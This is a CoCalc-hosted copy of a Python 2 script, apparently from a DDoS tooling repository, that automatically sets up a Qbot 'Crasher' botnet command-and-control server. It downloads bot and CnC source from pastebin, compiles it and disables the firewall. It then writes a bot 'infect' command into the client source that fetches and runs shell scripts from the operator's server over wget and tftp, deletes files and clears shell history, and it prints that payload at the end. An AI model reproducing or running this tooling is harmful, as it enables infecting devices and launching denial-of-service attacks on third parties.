Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Auto Setup Qbot/Crasher AutoSetup.py
5038 views
1
import subprocess
2
3
def cri(cmd):
4
subprocess.call(cmd, shell=True)
5
def replace_line(file_name, line_num, text):
6
lines = open(file_name, 'r').readlines()
7
lines[line_num] = text
8
out = open(file_name, 'w')
9
out.writelines(lines)
10
out.close()
11
12
print'\x1b[1;36m _____ _ '
13
print'\x1b[1;36m / ____| | | '
14
print'\x1b[1;36m | | _ __ __ _ ___| |__ ___ _ __ '
15
print'\x1b[1;36m | | | __/ _` / __| _ \ / _ \ __|'
16
print'\x1b[1;36m | |____| | | (_| \__ \ | | | __/ | '
17
print'\x1b[1;36m \_____|_| \__,_|___/_| |_|\___|_| '
18
print'\x1b[1;36m '
19
print'\x1b[1;37m[\x1b[1;36mCrasher\x1b[1;37m] \x1b[1;37mCnC AutoSetup \nDeveloped By \x1b[0;31mFlexingOnLamers\x1b[1;37m/\x1b[0;31mCri'
20
21
ip = raw_input("\x1b[1;37mEnter Your Server IP:\x1b[1;35m")
22
user = raw_input("\x1b[1;37mEnter Desired Username:\x1b[1;35m")
23
passw = raw_input("\x1b[1;37mEnter Desired Password:\x1b[1;35m")
24
bport = raw_input("\x1b[1;37mEnter Desired BotPort:\x1b[0;31m")
25
port = raw_input("\x1b[1;37mEnter The Port You Want to screen on:\x1b[1;35m")
26
27
print '\x1b[1;35mInstalling Needed Dependencies..\x1b[1;37m'
28
cri('yum update -y')
29
cri('yum install python-paramiko gcc screen nano wget httpd iptables perl -y;')
30
cri('yum install gcc cmake gmp gmp-devel libpcap-devel gengetopt byacc flex -y')
31
cri('yum install json-c-doc.noarch json-c.i686 json-c.x86_64 json-c-devel.i686 json-c-devel.x86_64 -y')
32
cri('yum install epel-release -y')
33
cri('yum install gengetopt -y')
34
cri('wget -q https://pastebin.com/raw/Hx6JmN35 -O crasher.c')
35
cri('gcc -o crasher crasher.c -pthread')
36
cri('rm -rf crasher.c')
37
cri('wget -q https://pastebin.com/raw/J2W0uHsi -O client.c')
38
cri('wget -q https://pastebin.com/raw/Ne69fRpz -O cc7.py')
39
cri('service iptabes stop')
40
cri('service httpd restart')
41
cri('systemctl stop firewalld')
42
cri('httpd -k restart')
43
cri('httpd -krestart')
44
cri('pkill screen')
45
46
replace_line('client.c', 859, 'unsigned char *AllDemDupes[] = { "'+ ip +':'+ bport +'" };\n')
47
replace_line('client.c', 861, 'char *infect = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://'+ ip +'/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp '+ ip +' -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g '+ ip +'; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh; rm -rf *;history -c\r\n";\n')
48
cri("echo "+ user +" "+ passw +" >> login.txt")
49
cri("python cc7.py client.c "+ ip +"")
50
cri("screen ./crasher "+ bport +" 1 "+ port +"")
51
print '\x1b[1;37mT'
52
print '\x1b[1;35mcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://'+ ip +'/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp '+ ip +' -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g '+ ip +'; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh; rm -rf *'
53
print '\x1b[1;37mThank you '+ user +' for using the \x1b[1;37m[\x1b[0;31mCrasher\x1b[1;37m] \x1b[1;37mCnC AutoSetup \n\x1b[0;31mPastebin\x1b[1;37m:\x1b[1;36mhttps://pastebin.com/u/flexingonlamers \n\x1b[0;31mGithub\x1b[1;37m:\x1b[1;36mhttps://github.com/AgentCri/ \n\x1b[0;31mEmail\x1b[1;37m:\x1b[1;[email protected] \n\x1b[0;31mDiscord\x1b[1;37m:\x1b[1;36mCri#4614'
54